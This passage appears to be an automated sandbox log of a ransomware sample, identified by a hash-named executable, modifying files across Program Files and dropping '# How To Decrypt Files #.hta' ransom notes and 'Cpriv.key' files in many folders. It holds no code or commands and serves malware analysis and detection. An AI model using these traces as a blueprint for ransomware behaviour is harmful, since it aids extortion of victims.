(x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03014_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01563_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239997.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21365_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21334_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Formal.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\CHIMES.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089945.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\selection_subpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Essential.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\AssertDebug.dwg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00126_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14655_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\Accessories\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsFormTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSQRY32.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185834.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\skins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us\AccessMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR37F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\OliveGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\STOCKS.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\sw.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS2SWOOS.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.DOC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Country.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00531_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02263_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02041_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDREQL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\XMLSDK5.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\CollectSignatures_Sign.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZMAIN.ACCDE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageSlice.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Publisher.en-us\PublisherMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00390_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107152.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\XML2WORD.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Source Engine\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15276_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ml.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02009_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee100.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\XOCR3.PSP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALENDAR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01637_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS9CRNRH.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\activity16v.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Triedit\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF 